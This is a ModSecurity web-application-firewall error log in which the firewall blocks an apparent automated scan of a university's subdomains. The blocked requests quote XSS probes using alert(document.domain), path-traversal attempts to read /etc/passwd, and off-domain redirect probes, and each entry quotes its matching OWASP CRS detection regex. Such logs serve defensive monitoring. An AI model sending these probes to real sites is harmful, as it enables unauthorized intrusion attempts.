[Tue Aug 29 11:52:34.696321 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO15ksCo-f0AAAoPuVkAAAAM"]
[Tue Aug 29 11:52:35.585735 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO15k8Co-f0AAAoO50QAAAAK"]
[Tue Aug 29 11:52:35.618956 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:email_create. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: \\x22 onmouseover= found within ARGS:email_create: 2Ue0GylxOzjssB9Fxo2BoPQRLhR@bIUx0.com\\x22 onmouseover=alert(document.domain) y="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO15k8Co-f0AAAfWOPQAAAAL"]
[Tue Aug 29 11:52:36.781626 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lMCo-f0AAAoT7McAAAAD"]
[Tue Aug 29 11:52:36.878861 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lMCo-f0AAAnTlRcAAAAA"]
[Tue Aug 29 11:52:36.898304 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lMCo-f0AAAnHQkkAAAAT"]
[Tue Aug 29 11:52:36.918516 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lMCo-f0AAAoT7MkAAAAD"]
[Tue Aug 29 11:52:37.540682 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAnTlSIAAAAA"]
[Tue Aug 29 11:52:37.541831 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAnd3IcAAAAI"]
[Tue Aug 29 11:52:37.557319 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAoUJakAAAAB"]
[Tue Aug 29 11:52:37.557490 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAfWOPgAAAAL"]
[Tue Aug 29 11:52:37.561632 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAnjjQ0AAAAX"]
[Tue Aug 29 11:52:37.562076 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAnTlSMAAAAA"]
[Tue Aug 29 11:52:37.562772 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAoGFZMAAAAE"]
[Tue Aug 29 11:52:37.570759 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAoQ3KEAAAAN"]
[Tue Aug 29 11:52:37.592956 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lcCo-f0AAAoO50oAAAAK"]
[Tue Aug 29 11:52:37.619471 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lcCo-f0AAAnjjQ8AAAAX"]
[Tue Aug 29 11:52:37.620253 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lcCo-f0AAAoUJasAAAAB"]
[Tue Aug 29 11:52:37.683662 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:DOC. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:DOC: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wgarcmin.cgi"] [unique_id "ZO15lcCo-f0AAAfWOPwAAAAL"]
[Tue Aug 29 11:52:38.592983 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lsCo-f0AAAfWOP4AAAAL"]
[Tue Aug 29 11:52:38.689341 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lsCo-f0AAAoPuWcAAAAM"]
[Tue Aug 29 11:52:39.773863 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15l8Co-f0AAAoPuWoAAAAM"]
[Tue Aug 29 11:52:40.070951 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAoUJbYAAAAB"]
[Tue Aug 29 11:52:40.087417 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAnjjR4AAAAX"]
[Tue Aug 29 11:52:40.600276 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAoO51UAAAAK"]
[Tue Aug 29 11:52:40.602468 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAoPuW8AAAAM"]
[Tue Aug 29 11:52:40.635228 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAoUJbsAAAAB"]
[Tue Aug 29 11:52:40.636221 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAnjjSMAAAAX"]
[Tue Aug 29 11:52:40.637112 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAoPuXAAAAAM"]
[Tue Aug 29 11:52:40.655259 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAoVqnkAAAAH"]
[Tue Aug 29 11:52:40.661405 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAoGFacAAAAE"]
[Tue Aug 29 11:52:40.680574 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 